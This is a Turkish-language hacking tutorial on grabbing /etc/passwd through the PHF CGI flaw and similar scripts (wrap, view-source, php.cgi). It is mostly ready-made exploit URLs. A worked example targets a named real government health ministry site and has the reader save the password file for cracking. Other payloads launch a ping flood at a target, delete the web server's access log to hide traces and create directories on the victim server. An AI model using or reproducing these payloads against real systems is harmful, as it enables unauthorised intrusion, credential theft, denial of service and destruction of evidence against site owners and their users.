|
Selam arkadaşlar.
Bu bölümle hacking için passwd dosyalarının alımına başlıyoruz. En önemli
kısımlardan biri olan bu bölüm uzun sürecek. İlk olarak PHF tekniğini
inceleyeceğiz. Bu teknik çok basit bir yöntemdir. Ama tabiki işe yarar. Ama her sitede
değil. Daha çok web site hackingte kullanılır.
Mantik : phf sistemlerde bulunan bir acikdir ve bu acik sayesinde sisteme web uzerinden
baglanip shellde bazi komutlari calistirabilirsiniz... Not : Calistirdiginiz komutlar cd,
ls, cat gibi komutlar silme islemlerini phf uzerinden yapamiyorsunuz...
--------------------------------------
Ozellikler : phf sayesinde her hangi bir serverdan elinizde acc olmadan passwd
dosyasini alabilir ve kirabilirsiniz... Bu olay web uzerinden olur
ve hizli olur
--------------------------------------
Kullanim : phf nin kullanimi basitdir, sizi fazla zorlamaz. browsera girdiginiz adresin
sonu asagidaki
satiri yazarsaniz "passwd" dosyasini browser penceresinde gorursunuz...
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bu satirin mantigi sudur...
Asagidaki satir phf olayini acar...
/cgi-bin/phf?Qalias=x%0a
Bu satirdan sonra yazacaginiz komutlar sistem uzerinde calistirilir...
ornegin :
cat%20/etc/passwd etc dizinin altindaki
passwd dosyasini goruntuler burda %20 bosluk oldugunu
belirtir yani :
/cgi-bin/phf?Qalias=x%0als yazarsaniz bulundugunuz dizindeki
dosyalar goruntulenir...
/cgi-bin/phf?Qalias=x%0als%20pass* yazarsaniz bulundugunuz dizinde
pass ile baslayan butun dosyalari listeler... Komutun Kullanimi Kolay! Simdi Biraz Ornek
Cozelim!
--------------------------------------
Evet bu ornek kesinlikle ogretim amacli cozulmusdur herhangi bir art niyetim yok
Hedef : T.C. Saglik Bakanligi
Gerekli Bilgiler : Sadece web sayfalarinin adresi : www.saglik.gov.tr
Browser inizi calistirin...Adres olarak www.saglik.gov.tr yazin. Evet sayfa geldi simdi
bakalim phf acigi
var mi ?
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0als
yazin!
tamam dosya listesi karsimiza geldigine gore phf olayi isliyor... Simdi passwd dosyasini
alalim... cat /etc/passwd
komutu ile... bu nu phf ile asagidaki gibi yaziliyor...
http://www.saglik.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
tamam Ok dir password dosyasini gordunuz!
bunu simdi cut/copy/paste ile bir dosyaya saklayin...
CGI-BIN 'de güvenlik Açıkları (Düzenleyen Projman)
a- (Phf scripti): Pek çok web ana bilgisayarı CGI-BIN güvenliğinden yoksundur. Bir de bunun
üzerine sistem yöneticilerinin CGI-BIN güvenlik açıklarını bilmemesi potansiyel
sistem açıklarına yol açmaktadır. Tüm dünyada pek çok hacker'ın kullandığı
cgi-bin güvenlik açığı:
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acat%20/etc/passwd
Fakat bazı uyanık sistem yöneticileri phf komutunun
kullanımını sınırlamışlardır. Bu yüzden bu komutu çalıştıramayabilirsiniz.
Fakat yine de alternatif web makinaları üzerinde denemekte yarar var.
b- (Wrap Scripti): Irix işletim sisteminin 6.2 versiyonunda rastlanan bu hatayı da şöyle
istismar edebiliriz:
http://www.kıracağımızadres.com.tr/cgi-bin/wrap?../../../etc/passwd
http://www.kıracağımızadres.com.tr/cgi-bin/wrap?%0als
(...)
Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de
var. !!
c- (View Source Scripti): Denemek serbest (başarıya ulaşabilme ihtimali kadar ulaşamama
ihtimali de var)
http://www.kıracağımızadres.com.tr/cgi-bin/view-source?../../../etc/passwd
ya da
http://www.kıracağımızadres.com.tr/cgi-bin/view-source?%1b
or %0a %20
d- (php.cgi Scripti):
http://www.victim.com/cgi-bin/php.cgi?../../../etc/passwd
e- Diğer Denenebilir Scriptler:
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0aping%20-c%201000%20-s
%205000%20ip%20to%20shoot
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20fhp
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0acp%20phf%20.blah
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0als%20-al%20/dir/to/go
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0amkdir%20/www/dirtocreate
http://www.kıracağımızadres.com.tr/cgi-bin/phf?Qname=a%0arm%20../logs/access_log
Dikkat: Tüm Httpd girişleri ana
bilgisayarlarda günlük şeklinde tutulmaktadır. Bu yüzden güvenliği çok yüksek ve
sizin başınıza bela açacağınızı düşündüğünüz sitelere bu yöntemle
erişmeyi kesinlikle düşünmeyin !!!
|
